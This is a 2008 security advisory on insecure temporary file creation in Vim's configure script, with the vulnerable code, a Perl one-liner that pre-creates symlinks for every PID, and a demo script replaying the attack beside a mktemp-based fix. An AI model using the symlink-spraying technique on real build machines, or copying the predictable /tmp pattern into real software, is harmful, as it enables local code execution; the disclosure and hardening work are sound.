Vulnerable Vim
Insecure Temporary File Creation During Build: Arbitrary Code Execution


Product  : Vim -- Vi IMproved
Versions : >=5.0 (possibly older; 4.6 and 3.0 not vulnerable), <7.2b.014
Impact   : Arbitrary code execution
Wherefrom: Local
Original :

Insecure temporary file creation during the build process allows a
symbolic link attack and arbitrary code execution.  Patch provided.
Update: There is no race condition.  All files can be prepared
beforehand, which makes the attack reliable.


  ``Vim is an almost compatible version of the UNIX editor Vi. Many new
    features have been added: multi-level undo, syntax highlighting,
    command line history, on-line help, spell checking, filename
    completion, block operations, etc.''

    		-- Vim README.txt 


During the build process, a temporary file with a predictable name is
created in the ``/tmp'' directory.  This code in the configure script
is run when Vim is being built with Python support:


    677         dnl -- we need to examine Python's config/Makefile too
    678         dnl    see what the interpreter is built from
    679         AC_CACHE_VAL(vi_cv_path_python_plibs,
    680         [
    681             tmp_mkf="/tmp/Makefile-conf$$"
(1) 682             cat ${PYTHON_CONFDIR}/Makefile - <<'eof' >${tmp_mkf}
    683 __:
    684         @echo "python_MODLIBS='$(MODLIBS)'"
    685         @echo "python_LIBS='$(LIBS)'"
    686         @echo "python_SYSLIBS='$(SYSLIBS)'"
    687         @echo "python_LINKFORSHARED='$(LINKFORSHARED)'"
    688 eof
    689             dnl -- delete the lines from make about Entering/Leaving directory
(2) 690             eval "`cd ${PYTHON_CONFDIR} && make -f ${tmp_mkf} __ | sed '/ directory /d'`"
    691             rm -f ${tmp_mkf}

The attacker has to create ``/tmp/Makefile-conf<PID>'' before it is
first written to at (1); <PID> is the process ID of the running
configure script (``$$'').  As originally described, the attack is a
race: in the time between (1) and (2), arbitrary commands can be
written to the file, and ``make'' will execute them at (2).  Note that
the output of ``make'' is also passed to ``eval'' at (2), so commands
may run either as make recipes or as shell code echoed by the makefile.
Update: no race is needed.  If the file (or the target of a symbolic
link placed at that name) is not writable by the user running
configure, the redirection at (1) cannot open it and the truncation
will not happen[2]; configure merely reports the error and proceeds to
(2), where ``make'' executes the makefile the attacker prepared.  Since
the PID is not known in advance, the attacker may create a symbolic
link for every possible PID value beforehand, all pointing at the
prepared, non-writable makefile:
	time perl -e 'foreach (1..32768){ symlink "/path/to/exploit",
	    "/tmp/Makefile-conf$_" }'

	real    0m30.963s
	user    0m0.072s
	sys     0m29.694s
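The following script is an added example and is not code from the advisory or from Vim. It replays the temp-file handling of the configure fragment above inside a scratch directory that stands in for the world-writable ``/tmp'', with the attacker's symbolic links created first, and then shows one hardened form using ``mktemp'' in a builder-owned directory (a suggestion for illustration, not the upstream 7.2b.014 patch). The call to ``make -f'' is replaced by reading the file back, because the point is which file the builder ends up handing to ``make''. All paths, the stand-in Python ``Makefile'' and the marker string are constructed for the demo.

```shell
#!/bin/sh
# Added example, not code from the advisory or from Vim.  It replays the
# temp-file handling of the configure fragment above inside a scratch
# directory standing in for the world-writable /tmp, then shows one
# hardened form.  "make -f" is replaced by reading the file back, since the
# point is which file the builder ends up handing to make.  All paths,
# names and the stand-in Python Makefile are constructed for the demo.

set -u

# Build a scene: a stand-in /tmp, a stand-in Python config dir, and the
# attacker's preparation.  Echoes the scratch path for the callers.
setup_scene() {
    scratch=$(mktemp -d) || return 1
    mkdir -p "$scratch/attacker" "$scratch/python" || return 1
    printf 'LIBS=-lpython2.5\n' > "$scratch/python/Makefile"   # constructed
    # Attacker, beforehand: a Makefile whose "__" target runs the attacker's
    # commands, made non-writable so the redirection at (1) cannot open it
    # and leaves it intact (root ignores mode bits and would overwrite it,
    # still through a path the attacker chose).  Then one symlink per
    # candidate PID: the advisory covers 1..32768, a window around this
    # shell's PID is enough here.
    printf '__:\n\t@echo ATTACKER_COMMANDS_RUN_HERE\n' > "$scratch/attacker/Makefile"
    chmod 444 "$scratch/attacker/Makefile"
    pid=$(( $$ - 8 ))
    while [ "$pid" -le $(( $$ + 8 )) ]; do
        ln -s "$scratch/attacker/Makefile" "$scratch/Makefile-conf$pid"
        pid=$(( pid + 1 ))
    done
    echo "$scratch"
}

# The vulnerable pattern from configure: predictable name, the "cat >" at
# (1) follows whatever symlink is already there, and whatever the path
# holds afterwards is what "make -f ${tmp_mkf} __" runs at (2).
vulnerable_step() {
    scratch=$1
    tmp_mkf="$scratch/Makefile-conf$$"
    # configure does not run under "set -e": a failed redirection prints
    # "Permission denied" and the script carries on, hence the "|| true".
    cat "$scratch/python/Makefile" - <<'eof' >"${tmp_mkf}" || true
__:
	@echo "python_LIBS='$(LIBS)'"
eof
    cat "${tmp_mkf}"           # stands in for: make -f ${tmp_mkf} __
    rm -f "${tmp_mkf}"
}

# One hardened form (a suggestion for illustration, not the upstream
# patch): mktemp picks an unpredictable name and creates it with O_EXCL,
# so a pre-placed symlink or file cannot be reused; the file lives in a
# directory the builder owns rather than in /tmp; and any failure aborts
# instead of feeding a stale file to make.
hardened_step() {
    scratch=$1
    workdir="$scratch/buildtree"        # stands in for the Vim source tree
    mkdir -p "$workdir" || return 1
    tmp_mkf=$(mktemp "$workdir/Makefile-conf.XXXXXX") || return 1
    if [ -L "$tmp_mkf" ] || [ ! -f "$tmp_mkf" ]; then
        rm -f "$tmp_mkf"; return 1
    fi
    cat "$scratch/python/Makefile" - <<'eof' >"${tmp_mkf}" || { rm -f "$tmp_mkf"; return 1; }
__:
	@echo "python_LIBS='$(LIBS)'"
eof
    cat "${tmp_mkf}"
    rm -f "${tmp_mkf}"
}

scene=$(setup_scene) || exit 1
echo "== file the vulnerable step would hand to make =="
vulnerable_step "$scene"
echo "== file the hardened step would hand to make =="
hardened_step "$scene" || echo "hardened step aborted"
rm -rf "$scene"
```

Run it as an unprivileged user: the vulnerable step prints the shell's "Permission denied" for the redirection and then shows the attacker's makefile, which is exactly what ``make -f'' would have executed; the hardened step shows the legitimate generated makefile. Run as root the mode bits are ignored and the builder instead overwrites the attacker's file, which still means the build wrote through a path the attacker chose.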


No test case.


A patch fixing this vulnerability can be found at the following URL:

Please note: The patch fixes ``src/'', an input file used by
the ``autoconf'' command.  ``autoconf'' uses this input file to create
``src/auto/configure''.  It is necessary to remove the latter, if
present, to force its recreation.  Otherwise, further build runs will
still use it, and the vulnerability will still be present.

Patch 7.2b.014[1] fixes this vulnerability.


[1] Patch 7.2b.014
    Message-Id: <>

[2] Thanks to Robert Buchholz for pointing this out in:
    Message-Id: <>


This advisory is Copyright 2008 Jan Minar <>

Copying welcome, under the Creative Commons ``Attribution-Share Alike''

Code included herein, and accompanying this advisory, may be copied
according to the GNU General Public License version 2, or the Vim
license.  See the subdirectory ``licenses''.

Various portions of the accompanying code were written by various
parties.  Those parties may hold copyright, and those portions may be
copied according to their respective licenses.


2008-07-26 Update: There is no race condition
2008-07-24 Added info on Patch 7.2b.014 (fixes the vulnerability)
2008-07-18 Formatting changes
2008-07-17 Sent to: <>, <>